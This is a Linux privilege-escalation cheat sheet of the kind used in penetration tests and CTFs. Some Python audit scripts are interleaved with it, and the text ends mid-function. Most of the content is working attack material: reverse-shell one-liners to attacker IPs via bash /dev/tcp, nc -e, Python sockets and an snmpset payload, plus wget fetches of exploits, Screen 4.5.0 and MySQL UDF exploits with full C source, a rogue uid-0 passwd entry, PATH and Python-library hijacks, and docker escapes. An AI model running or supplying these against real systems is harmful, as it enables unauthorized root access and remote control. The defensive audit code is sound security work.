
Privilege Escalation


Priv Esc Links:

1) https://gtfobins.github.io/ (useful for privesc / jail-escape tasks)

2) Priv Esc Tech Explained | Explained 2 | Techniques | Commands | Priv Esc Techniques

3) Linux Restricted Shell Bypass Guide

Things to Check first for Linux Priv Esc

1.  sudo -l
2.  sudo su
3.  uname -a / cat /proc/version   --> check the kernel version for known vulns
4.  check for files with root privileges
5.  check for cron jobs
6.  /etc/passwd file --> writable?
7.  PATH exploit (relative command names in scripts or binaries)
8.  check for processes running as root
9.  run pspy to check for running processes & cron jobs
10. check .bash_history
11. ls -la the home directory
12. check the /opt/, /var/www/html, /home/, /root and / directories thoroughly
13. check for world readable files
14. check if mysql is running as root
15. "mount" command to check for permissions on mounted folders/filesystems
16. run "pspy -f" on the target and check all running file system tasks
17. check file/folder permissions: even if you don't own the file, the folder might be owned by you, in which case you can add/delete files or rename them.

Ex: the file runs as root but the folder is owned by you; delete the file and create a new one with the same name and you can get root access.





Binary PrivEsc:

file binary
strings binary
cat binary
ls -la binary

Check the file to see if it's executing any commands.
Check the file paths it uses;
if the command is "cat" instead of "/bin/cat" --> path injection might be possible.

Decrease the size of the terminal and check for changes.

less binary

./binary | less   //Try getting an interactive shell with less
      //Then !command to execute the command; it might only work with a certain screen size

./binary anycommand && /bin/bash
sudo -l            --> Check for root priv directories and applications
sudo -u USERNAME /PATH/PROGRAM.sh shell.sh
sudo bash          --> Get root shell
id                 --> get the user privileges

When id is not installed, use this script:

awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status

Check Version and Distribution

uname -a
cat /proc/version
cat /etc/issue
cat /etc/lsb-release
sudo id                        --> Check privilege level
ps aux | grep root             --> check for applications running as root
netstat -tulpn                 --> see all connections, local and foreign
netstat -a                     --> find all listening ports

When netstat is not installed, use this netstat-without-netstat awk script

python -c 'import pty;pty.spawn("/bin/bash")'

python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'   //only works when the interpreter is SUID root or has CAP_SETUID

--> spawn a python shell; sometimes python3 works as well

Get Interactive Shell:

python -c 'import pty;pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo
fg
export TERM=xterm
Grep Recursively for a string   

grep -iRI 'password'

#Grep for a user/string
grep bhanu /etc -R 2>/dev/null
Port Scanning using nc

echo "" | nc -nvw2 [targetIP] [port-range]

echo "" | nc -nvw2 10.10.10.10 20-100

Finding Files with Root Privileges: 

find / -perm -4000 2>/dev/null | xargs ls -la

Finding World Readable Files:
find / -perm -2 ! -type l -ls 2>/dev/null

World Writable & Executable directories:
find / \( -perm -o=w -a -perm -o=x \) -type d 2>/dev/null

World Executable Folders:
find / -perm -o=x -type d 2>/dev/null

Find SUID & SGID Binaries:
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done

find / -perm -1000 -type d 2>/dev/null     #Sticky bit: only the owner of the directory or the owner of a file can delete or rename here.

find / -perm -g=s -type f 2>/dev/null      #SGID (chmod 2000) - runs as the group, not the user who started it.

find / -perm -u=s -type f 2>/dev/null      #SUID (chmod 4000) - runs as the owner, not the user who started it.
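A baseline-diff check for the SUID/SGID listing above, added here as an example (not code from the original page): it parses the "ls -la" style lines that "find ... | xargs ls -la" prints and flags entries missing from a known-good baseline, setuid-root files in user-writable directories, and setuid-root binaries that hand out a shell. The sample listing and baseline are constructed.

```python
# Added example (not from the original page): compare the SUID/SGID inventory
# that "find / -perm -4000 ... | xargs ls -la" prints against a known-good
# baseline and report what a defender should look at. Sample lines are constructed.
import re
from typing import Dict, List, Set

# A legitimately installed setuid binary should never live here.
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/", "/home/")
# Binaries that give a shell if they are setuid root (the GTFOBins pattern).
SHELL_CAPABLE = {"bash", "sh", "dash", "python", "python3", "perl", "find",
                 "vim", "vi", "nmap", "less", "more", "env", "cp", "mv"}

# mode links owner group size month day time/year path
LS_RE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+\s+"
    r"\S+\s+\S+\s+\S+\s+(?P<path>/\S+)$")

def parse_ls_line(line: str) -> Dict[str, str]:
    """Split one 'ls -la' line into mode/owner/group/path; reject junk loudly."""
    m = LS_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable ls line: {line!r}")
    return m.groupdict()

def audit_suid(current: List[str], baseline: Set[str]) -> List[str]:
    """Return findings: entries missing from the baseline, setuid-root files in
    user-writable directories, and setuid-root binaries that hand out a shell."""
    findings: List[str] = []
    for line in current:
        e = parse_ls_line(line)
        path, mode, owner = e["path"], e["mode"], e["owner"]
        is_suid = mode[3] in "sS"          # user-execute slot shows 's' when setuid
        is_sgid = mode[6] in "sS"          # group-execute slot shows 's' when setgid
        if not (is_suid or is_sgid):
            continue                       # find already filtered; stay defensive
        name = path.rsplit("/", 1)[-1]
        if path not in baseline:
            findings.append(f"NEW: {path} ({mode}, owner {owner})")
        if is_suid and owner == "root" and path.startswith(SUSPICIOUS_DIRS):
            findings.append(f"SUID ROOT IN USER-WRITABLE DIR: {path}")
        if is_suid and owner == "root" and name in SHELL_CAPABLE:
            findings.append(f"SUID ROOT SHELL-CAPABLE BINARY: {path}")
    return findings

# Constructed inventory: three normal entries, then the two artefacts a
# 'chmod u+s /bin/bash' and a compiled /tmp/getroot leave behind.
SAMPLE_LS = [
    "-rwsr-xr-x 1 root root   59976 Mar 22  2019 /usr/bin/passwd",
    "-rwsr-xr-x 1 root root  149080 Jan 18  2019 /usr/bin/sudo",
    "-rwsr-xr-x 1 root root   44528 Mar 22  2019 /usr/bin/chsh",
    "-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash",
    "-rwsr-xr-x 1 root root   16712 Jan  1 12:00 /tmp/getroot",
]
BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh"}

if __name__ == "__main__":
    for finding in audit_suid(SAMPLE_LS, BASELINE):
        print(finding)
```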
List the Capabilities of files which have root privileges

getcap -r / 2>/dev/null

#List all capabilities of the current process
capsh --print

Find Services Running Behind Firewall/Localhost
netstat -ano
netstat -tulpn
netstat -pantu | grep LIST   #View listening ports

Try Sudo inject
https://github.com/nongiach/sudo_inject
CRON Jobs 

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root 
Ping Sweep

for i in {1..254}; do (ping -c 1 10.10.10.$i | grep "bytes from" &); done

find . -type f -ls                --> Find files in all directories
lsof -l                           --> View running processes / open files
echo os.system("/bin/bash")       --> Escaping limited shell using ssh

gcc exploit.c -pthread -lcrypt -o Exploit   --> Compile the exploit

gcc -m32 -Wl,--hash-style=both 9542.c -o exploit

./Exploit
cat .bash_history                 --> Check the command history
sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt/ -o allow_other   --> Mount a shared folder in your Kali machine

df -h                             --> Get list of machine partitions (mounted devices as well)
/dev/shm                          --> World writable directory
cat /dev/sdb                      --> Might contain deleted data in the partition;
                                      can try strings /dev/sdb for flags
python -m SimpleHTTPServer 8080   --> Start an HTTP server on your system

wget http://yourip/LinuxEnum.sh   --> Run this on the target machine to fetch the file

wget http://yourip/LinuxEnum.sh  --> Run this in target machine to get this file
Send a File From Kali To Victim

nc -nlvp 9001 < exploit.c                 --> Serve the file from Kali

nc YourIpAddress 9001 > /tmp/exploit.c    --> Get the file on the target machine (same port as the listener)

Get a File From Victim to Kali

on Kali: nc -l -p 8001 > filefoldername

on victim: nc -w 5 10.10.14.14 8001 < /usr/local/bin/filename
Adding a Route to a different network which is accessible

#sudo ip route add CIDR dev Interface
sudo ip route add 10.10.0.0/24 dev tun2

When anything can only be run as a specific user:

sudo -u UserName /bin/bash             //works when you see this in sudo -l
Getting Root using PATH INJECTION:

This only works for relative paths (my-program): the binary actually lives in
/bin/my-program but is shown as my-program in the process list.

This can be exploited by:

1) In the process list --> the full path should not be specified; a relative path should be shown.

2) Check when my-program is running, what is causing it to run, and how to make it run.

3) Check the original location with the "which my-program" command.

          /bin/my-program

4) For this exploit to work you need write access to a directory that comes earlier in PATH, such as
   /usr/local/bin; if /usr/local/bin is before /bin, we should be able to exploit this.

         echo $PATH       //get the path info
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

This is mandatory for this to work, because the lookup for my-program checks the
/usr/local/bin directory first (it is first on the list), and if a file named "my-program"
is available in that first directory, it stops searching further.

5) Now go to /usr/local/bin ("cd /usr/local/bin") and create a file with the same name as the program.

        vi my-program

6) Add a reverse shell to my-program and make it run via whatever triggers it externally, which
   can get you a root shell. Don't forget to chmod +x my-program.
Priv Esc using Path Injection

This technique can be used when an absolute path is not defined for an executable in a script or service.

cd /tmp
echo 'bash -i >& /dev/tcp/10.10.10.10/9002 0>&1' > gzip
echo 'chmod u+s /bin/bash' > suid       #alternative payload for the hijacked file (gives a SUID bash instead of a reverse shell)
chmod +x gzip
export PATH=/tmp:$PATH

#execute the script as root which uses gzip (for example) in it
sudo /opt/script.sh

#SUID permission should look like
#-rwsr-xr-x 1 root root 1113504 Jun 6 2019 /bin/bash

#for SUID permissions run
/bin/bash -p
Exploiting the Binary's Path Used in a Binary

For example, the binary /usr/local/bin/devil (has root privs) runs a command which uses "cat"
to read a file from /home/freak:

cd /home/freak/

echo "/bin/sh" > cat
chmod +x cat
export PATH=/home/freak:/freak:$PATH
/usr/local/bin/devil                 //GET ROOT
Decode Binary to ASCII for Orchid CMS 

perl -lpe '$_=pack"B*",$_' < <( echo 010000000110010001101101001000010110111001011111010100000100000001110011011100110101011100110000011100100110010000100001 )
Dumping Data from Mysql

mysqldump -uUserNAME -pP@$$w0rd DB_NAME 
Getting Root Using Mysql; When mysql is running as root -- Priv Esc

locate udf             //   /usr/lib/lib_mysqludf_sys.so --> this is essential for this exploit to work.

mysql -u root -p
select sys_exec('usermod -a -G admin john');   //Giving root privileges (adds john to the admin group)

ctrl + C

sudo su    //enter the user password .. you are root now

Method II:
create function sys_exec returns integer soname 'lib_mysqludf_sys.so';

select sys_exec('chmod u+s /bin/bash');

ctrl + c

bash -p

Reference - Windows & Linux


Method - III -> Mysql 4.x - 5.x

searchsploit -m exploits/linux/local/1518.c

on Target Machine:

cd /tmp
wget http://192.168.0.2/1518.c

cp 1518.c raptor_udf2.c
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc

mysql -u root -p

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
//If this doesn't work try this -->
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;
select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');

\! sh
cat /tmp/out
exit
exit

cd /tmp

vi getroot.c     //add the below content to this

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    setresuid(0, 0, 0);
    setresgid(0, 0, 0);
    system("/bin/bash");
    return 0;
}

mysql -u root -p
select * from mysql.func;

//Creating a SUID Binary
select do_system('gcc -o /tmp/getroot /tmp/getroot.c');
select do_system('chmod u+s /tmp/getroot');

exit
exit
cd /tmp
./getroot
 

For Windows follow this --> Github Exploit | Video Tutorial

Cracking mysql Hashes

mysql -u root -p'passw@rd' -D database_name
show tables;
select * from tablename;

#sample hash (md5crypt, hashcat mode 500)
$1$llol$srpNQb9srgHAqNAes0FGC1

hashcat -m 500 hash /usr/share/wordlists/rockyou.txt
 
Postgresql Is Running As Root

psql -h 127.0.0.1 -d DB_NAME -U unixusrmgr   //Enter the password when prompted

\dt      //List tables
\dp      //Get DB privileges
select * from table_name;   //Check the home directory column (just in case)

Example to update a value in all matching rows:
update table_name set gid=0 where gid=1001;   //Giving root group privileges

or
insert into passwd_table (username,passwd,gid,homedir) values ('freak','openssl_encrypted password',0,'/');

Priv Esc When CAT is being used in the system() function

When an executable runs cat via system("cat /home/bhanu/root.txt"),
we can set a new PATH pointing at a directory we control; the lookup then
checks our directory first and finds our "cat" before the real one.

echo $PATH
//      /usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

echo "/bin/bash" > cat

chmod 777 cat

export PATH=/home/bhanu

echo $PATH
//      /home/bhanu

./file_to_run           //This file has the system() function with cat

#You get a new shell :) but as we replaced the whole PATH, nothing else will work until it is restored:

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Port Scanning with NMAP (or with nc, as below):

for port in $(seq 1 65535); do nc -nvzw1 VICTIM_IP $port 2>&1; done | grep open
Port Forwarding using SoCat:

Start a socat listener on Victim_machine2 - ports 8009 & 8080, and listen for them on the first compromised machine.

From the Victim-1 machine: do a port scan as above and port forward the required ports.
//Binding the VICTIM-2 ports to the Victim-1 machine so that we can access them from our Kali machine
socat tcp-listen:8009,fork tcp:VICTIM2_IP:8009 &
socat tcp-listen:8080,fork tcp:VICTIM2_IP:8080 &

netstat -plunt    //View the bound ports; we can see 8009 & 8080 on Victim_machine1

Access the Victim-2 ports on our Kali machine: on the Victim-1 machine:
socat tcp-listen:4321,fork tcp:KALI_IP:4321 &

Priv Esc When NMAP Is running as root

/usr/local/bin/nmap  --interactive

!sh 
Priv Esc When wget is running as root

Copy the /etc/passwd from the target machine 

On KALI: 

paste the /etc/passwd from the target and add this line at the end.

bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash

on Target:

sudo wget -O /etc/passwd http://10.10.14.13/passwd
 
su bhanu
password
Priv Esc When Find is Running as root

find /home -exec sh -i \;

Priv Esc when "Perl" is running as root

./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'

Priv Esc When "PWD" is being used in a Binary

export PWD=\$\(/bin/bash\)            //In the same directory as the binary
Priv Esc with Spice Ports

netstat -anlp | grep LIST

127.0.0.1:5900
127.0.0.1:5901
127.0.0.1:5902               //are listening

ps -ef | grep 5900           // shows what it is --> spice port; libvirt

On Kali:

remote-viewer                // apt install virt-viewer

proxychains remote-viewer spice://127.0.0.1:5900
proxychains remote-viewer spice://127.0.0.1:5901
proxychains remote-viewer spice://127.0.0.1:5902

when the VNC console opens --> send key --> ctrl+alt+del --> the system reboots

interrupt the boot process (bootloader menu) --> press e

go to the last-but-one line --> change "ro" to rw init=/bin/sh

passwd              //change the password
sync
Priv Esc when you have snmpd.conf - rwcommunity string

snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c PASSWORD 10.10.10.10 'nsExtendStatus."evilcommand"' = createAndGo 'nsExtendCommand."evilcommand"' = /usr/bin/python3 'nsExtendArgs."evilcommand"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"KALI_IP\",PORT));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
Priv Esc/Enum when 11211 is running

telnet 127.0.0.1 11211
stats cachedump 1 0
get name1
get name2
Priv Esc When /etc/passwd is World Writable

openssl passwd -1 -salt freak password
      --> used to generate a salted (md5crypt) password hash for the /etc/passwd file;
freak = salt
password = password

$1$freak$/IWD8R6aL2zyhUZPUeAXm. --> Hashed Password

username:<hash from openssl above>:0:0::/root:/bin/bash
                --> create a new account with root privileges (uid 0, gid 0)

echo 'bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash' >> /etc/passwd
            --> add this entry to /etc/passwd to get root access
su bhanu
password: password
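An integrity check for /etc/passwd, added here as an example (not code from the original page) for both the wget overwrite and the world-writable case above: it parses passwd(5) lines and flags extra uid-0 accounts, hashes stored directly in the passwd field, empty password fields, duplicate names and a group/world-writable file mode. The sample content and mode are constructed (the bhanu line is the entry shown above).

```python
# Added example (not from the original page): check /etc/passwd content and
# mode for the conditions the tricks above create: extra uid-0 accounts, a
# password hash kept in the passwd field instead of 'x' (so /etc/shadow is
# bypassed), duplicate names, empty password fields, and group/world-writable
# file mode. The sample file content is constructed.
import stat
from typing import List, NamedTuple

class PasswdEntry(NamedTuple):
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str

def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; each must have exactly 7 colon-separated fields."""
    entries: List[PasswdEntry] = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {n}: expected 7 fields, got {len(parts)}")
        name, pw, uid, gid, gecos, home, shell = parts
        entries.append(PasswdEntry(name, pw, int(uid), int(gid), gecos, home, shell))
    return entries

def audit_passwd(text: str, mode: int) -> List[str]:
    """mode is the st_mode of the file, e.g. os.stat('/etc/passwd').st_mode."""
    findings: List[str] = []
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(f"/etc/passwd is group/world writable (mode {stat.S_IMODE(mode):04o})")
    seen = set()
    for e in parse_passwd(text):
        if e.name in seen:
            findings.append(f"duplicate user name: {e.name}")
        seen.add(e.name)
        if e.uid == 0 and e.name != "root":
            findings.append(f"extra uid-0 account: {e.name} (home {e.home}, shell {e.shell})")
        if e.passwd == "":
            findings.append(f"empty password field for {e.name} (login without password)")
        elif e.passwd not in ("x", "*", "!", "!!"):
            findings.append(f"password hash stored in /etc/passwd for {e.name}")
    return findings

# Constructed sample: a normal root and daemon line, then the entry shown above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bhanu:$1$freak$/IWD8R6aL2zyhUZPUeAXm.:0:0::/root:/bin/bash
"""

if __name__ == "__main__":
    # 0o100666 stands in for a world-writable regular file; use os.stat on a live box.
    for finding in audit_passwd(SAMPLE_PASSWD, 0o100666):
        print(finding)
```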
Priv Esc Using Python Library Hijacking

Rastalab - Python Library Hijacking

# go to the location of the python script that you are trying to hijack,
# which is running as root or as any required user

python -c 'import sys; print "\n".join(sys.path)'      #python2 print syntax

#select a library, ex: shutil; go to a writable directory
mkdir fakelib
cd fakelib
nano shutil.py

import os

def make_archive(a, b, c):
    os.system("nc 10.10.10.10 9001 -e '/bin/sh'")


#exit
#for example; if you can run root_script.sh as root without a password and it uses some python script
sudo PYTHONPATH=~/fakelib /opt/scripts/root_script.sh
Priv Esc When Sysinfo is running as root

mkdir /tmp/hack
cd /tmp/hack

nano lshw     (or fdisk, or any other command that is executed when you run sysinfo)

#Add a reverse shell in the file
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP_ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

chmod +x lshw

#add the folder to PATH, so that when sysinfo runs - it checks this directory first

export PATH=/tmp/hack:$PATH

sysinfo
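One audit that covers the search-order hijacks on this page, added here as an example (not code from the original page): the PATH injection sections (relative my-program, gzip, cat in system(), sysinfo/lshw) and the Python library hijacking section all come down to a directory that is searched before the real file and is writable by an unprivileged user. The filesystem view, PATH string and module search order are constructed inputs passed in explicitly so the check runs offline; a live audit would fill the view from os.listdir and os.access.

```python
# Added example (not from the original page): one audit for the two
# search-order hijacks described above. A command typed without its full path
# (cat, gzip, lshw...) is looked up directory by directory along PATH, and a
# Python "import shutil" is looked up along sys.path the same way; in both
# cases any directory that is searched BEFORE the real file and is writable
# by an unprivileged user is a hijack point. Search order and writability
# are passed in explicitly so the check runs offline on constructed data.
import os
from typing import Dict, List, Optional, Set, Tuple

FsView = Dict[str, Tuple[Set[str], bool]]   # dir -> (file names present, writable by unprivileged user)

def first_match(candidates: Tuple[str, ...], order: List[str], fs: FsView
                ) -> Tuple[Optional[str], List[str], bool]:
    """Walk 'order'; return (resolved path, writable dirs searched earlier,
    whether the resolving dir itself is writable)."""
    earlier_writable: List[str] = []
    for d in order:
        files, writable = fs.get(d, (set(), False))
        hit = next((c for c in candidates if c in files), None)
        if hit is not None:
            return os.path.join(d, hit), earlier_writable, writable
        if writable:
            earlier_writable.append(d)
    return None, earlier_writable, False

def audit_path_lookup(command: str, path_env: str, fs: FsView) -> List[str]:
    """Findings for a relative command name resolved along PATH."""
    order = [d or "." for d in path_env.split(":")]   # empty element == cwd
    resolved, before, shadowable = first_match((command,), order, fs)
    out = [f"{command} resolves to {resolved}"]
    out += [f"HIJACKABLE: {d} is searched before {resolved} and is writable" for d in before]
    if resolved and shadowable:
        out.append(f"HIJACKED: {resolved} lives in a user-writable directory")
    out += [f"RISKY PATH ENTRY: {d}" for d in order if d == "." or d.startswith(("/tmp", "/home"))]
    return out

def audit_import(module: str, script_dir: str, pythonpath: str,
                 stdlib: List[str], fs: FsView) -> List[str]:
    """Findings for a module import: script dir, then PYTHONPATH, then stdlib."""
    order = [script_dir] + [p for p in pythonpath.split(os.pathsep) if p] + stdlib
    resolved, before, shadowable = first_match((f"{module}.py", f"{module}/__init__.py"), order, fs)
    out = [f"import {module} loads {resolved}"]
    out += [f"HIJACKABLE: {d} is searched before {resolved} and is writable" for d in before]
    if resolved and shadowable:
        out.append(f"HIJACKED: {resolved} comes from a user-writable directory")
    return out

# Constructed sample system mirroring the examples above.
SAMPLE_FS: FsView = {
    "/tmp":                 ({"gzip"}, True),             # attacker-created gzip
    "/usr/local/bin":       (set(), True),                # misconfigured: user-writable
    "/usr/bin":             ({"gzip"}, False),
    "/bin":                 ({"cat", "sh"}, False),
    "/opt/scripts":         ({"root_script.py"}, False),
    "/home/low/fakelib":    ({"shutil.py"}, True),
    "/usr/lib/python3.8":   ({"shutil.py", "os.py"}, False),
}
CLEAN_PATH = "/usr/local/bin:/usr/bin:/bin"
STDLIB = ["/usr/lib/python3.8"]

if __name__ == "__main__":
    for f in audit_path_lookup("gzip", "/tmp:" + CLEAN_PATH, SAMPLE_FS):
        print(f)
    for f in audit_import("shutil", "/opt/scripts", "/home/low/fakelib", STDLIB, SAMPLE_FS):
        print(f)
```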
Priv Esc When /bin/bash or /bin/sh is SUID

/bin/bash -p             // -p == runs without dropping the privileges
/bin/sh -p               // -p == runs without dropping the privileges

Priv Esc for Sudo 1.8.27 -- (ALL, !root) /bin/bash

sudo -u#-1 /bin/bash
Priv Esc When luvit can be run without Password

sudo -u USERNAME /home/sysadmin/luvit -e 'os.execute("/bin/bash")'

Priv Esc when a User is running in Docker

https://gtfobins.github.io/gtfobins/docker/

docker images

docker run -v /:/mnt --rm -it ubuntu chroot /mnt sh

Priv Esc when Snapd (< 2.37.1) is running

snap version             //Check the version - anything before 2.37.1 is vulnerable

Use this exploit         // Creates a new account

su dirty_sock            //password: dirty_sock
snap changes             //See changes - if sudo doesn't work
Priv Esc When Screen 4.5.0 is running as Root

https://www.exploit-db.com/exploits/41154

save the below content into rootshell.c
#include <stdio.h>
#include <unistd.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", (char *[]){"/bin/sh", NULL});
}

gcc -o /tmp/rootshell /tmp/rootshell.c   //Compile it


save the below content into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c   //Compile it


copy both compiled files into the /tmp directory on the target machine ..

Follow the below commands:

cd /etc
umask 000
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
screen -ls
/tmp/rootshell
When Wildcard is used in Sudo

sudo -l

//Wildcard example --> /home/*/*/file.txt (this case is vulnerable)
/var/www/*/*/file.txt

dpkg -l sudo             //1.8.16 sudo is vulnerable

searchsploit sudoedit

searchsploit -m linux/local/37710.txt

Exploitation:

mkdir folder1
cd folder1
mkdir folder2
cd folder2
ln -s /home/username/.ssh/authorized_keys file.html      //Create a symbolic link

sudoedit -u username /var/www/folder1/folder2/file.html  //add id_rsa.pub here

OR

sudoedit -u username /var/www/ .ssh/authorized_keys /file.html    //the text editor opens the text as 2 files, where .ssh/authorized_keys can be edited

On Kali: ssh-keygen   //Copy the id_rsa.pub into authorized_keys, which is file.html

ssh -i id_rsa username@IP_ADDRESS
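A reviewer for "sudo -l" output, added here as an example (not code from the original page) covering the sudo 1.8.27 (ALL, !root) case, the sudoedit wildcard case above, and the many "X can be run via sudo" sections: it parses the privilege lines sudo prints and flags the runas negation on pre-1.8.28 versions, sudoedit paths containing wildcards, and rules for shell-capable programs. The sample output and version string are constructed.

```python
# Added example (not from the original page): audit the privilege lines that
# "sudo -l" prints for the sudo weaknesses this page relies on: a runas list
# like (ALL, !root) on sudo before 1.8.28 (the -u#-1 bypass), sudoedit rules
# whose path contains wildcards (symlinked intermediate directories), and
# rules for programs that hand out a shell. The sample output is constructed.
import re
from typing import List, Tuple

# Programs this page shows escalating through sudo; extend from GTFOBins.
SHELL_PROGRAMS = {"bash", "sh", "find", "perl", "python", "python3", "pip", "pip3",
                  "nmap", "wget", "docker", "luvit", "vim", "less", "screen"}

# "(runas) TAG: cmd1, cmd2" as printed by sudo -l; tags are optional.
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def parse_version(v: str) -> Tuple[int, ...]:
    """'1.8.27p1' -> (1, 8, 27): compare numerically, never as strings."""
    return tuple(int(x) for x in re.findall(r"\d+", v)[:3])

def audit_sudo_rules(rules: List[str], sudo_version: str) -> List[str]:
    findings: List[str] = []
    ver = parse_version(sudo_version)
    for rule in rules:
        m = RULE_RE.match(rule)
        if not m:
            continue                        # header text, not a privilege line
        runas = [r.strip() for r in m.group("runas").split(",")]
        nopasswd = "NOPASSWD" in m.group("tags").upper()
        negated_all = "ALL" in runas and any(r.startswith("!") for r in runas)
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            base = cmd.split()[0].rsplit("/", 1)[-1]
            if negated_all and ver < (1, 8, 28):
                findings.append(f"CVE-2019-14287: runas ({', '.join(runas)}) on sudo {sudo_version}: {cmd}")
            if base == "sudoedit" and "*" in cmd:
                findings.append(f"CVE-2015-5602 pattern: sudoedit with wildcard path: {cmd}")
            if base in SHELL_PROGRAMS:
                findings.append(f"shell-capable {'NOPASSWD ' if nopasswd else ''}rule: ({', '.join(runas)}) {cmd}")
    return findings

# Constructed "sudo -l" output.
SAMPLE_SUDO_L = [
    "User bhanu may run the following commands on box:",
    "    (ALL, !root) /bin/bash",
    "    (root) NOPASSWD: /usr/bin/pip3 install *",
    "    (ALL) sudoedit /var/www/*/*/file.html",
    "    (root) /usr/bin/systemctl restart apache2",
]

if __name__ == "__main__":
    for finding in audit_sudo_rules(SAMPLE_SUDO_L, "1.8.27"):
        print(finding)
```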
Priv Esc with Ldapsearch

Might be useful --> Ldapsearch usage by Digital Ocean

cd /home/user/
cat ~/.ldaprc # if you can read this file - you can authenticate


#Enumerate Users

ldapsearch -x -LLL -w P@SSWORD!

ldap can be used to get ssh access. If you have write permission in ldap,
you can change a user's attributes, make them a root-group user and allow ssh access.

#Select a proper/useful group which has more privileges than you, ex: root/sudo
cat /etc/group

#Create an SSH public and private key
ssh-keygen -t rsa -f filename

#Select a user from the ldapsearch results --> save the below into bhanu.ldif
#Modify gidNumber & sshPublicKey

dn: uid=bhanu,ou=users,ou=citrix,ou=servers,dc=steins,dc=local
changetype: modify
replace: homeDirectory
homeDirectory: /root
-
add: objectClass
objectClass: ldapPublicKey
-
add: sshPublicKey
sshPublicKey: ssh-rsa <PUBLIC KEY REMOVED>
-
replace: userPassword
userPassword: P@ssword!
-
replace: gidNumber
gidNumber: 55

#Run the ldapmodify query to change the user's password and gid

ldapmodify -D "cn=current_user,dc=steins,dc=local" -w 'P@SSWORD!' -f bhanu.ldif
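A detection for the LDAP modification above, added here as an example (not code from the original page): it reads LDIF as printed by "ldapsearch -LLL" and flags posix accounts whose gidNumber maps to a root-equivalent group in /etc/group, whose home is / or /root, or that carry an sshPublicKey attribute. The LDIF and /etc/group content are constructed; the group that gid 55 maps to is an assumption of the sample.

```python
# Added example (not from the original page): scan LDIF output (the format
# ldapsearch -LLL prints and ldapmodify consumes) for posix accounts that have
# been pushed into a privileged group, given / or /root as home, or had an
# sshPublicKey added, which is what the modify above does. The /etc/group
# content and the LDIF are constructed samples.
from typing import Dict, List

def parse_ldif(text: str) -> List[Dict[str, List[str]]]:
    """Minimal LDIF reader: entries separated by blank lines, 'attr: value'
    lines, continuation lines start with a space. Multi-valued attrs are kept."""
    entries: List[Dict[str, List[str]]] = []
    cur: Dict[str, List[str]] = {}
    last = None
    for raw in text.splitlines() + [""]:
        if raw.startswith(" ") and last:            # folded continuation line
            cur[last][-1] += raw[1:]
            continue
        if not raw.strip():
            if cur:
                entries.append(cur)
            cur, last = {}, None
            continue
        if raw.startswith("#") or raw == "-":
            continue
        attr, _, value = raw.partition(":")
        attr = attr.strip()
        cur.setdefault(attr, []).append(value.strip())
        last = attr
    return entries

def privileged_gids(group_file: str,
                    names=("root", "sudo", "wheel", "admin", "docker")) -> Dict[int, str]:
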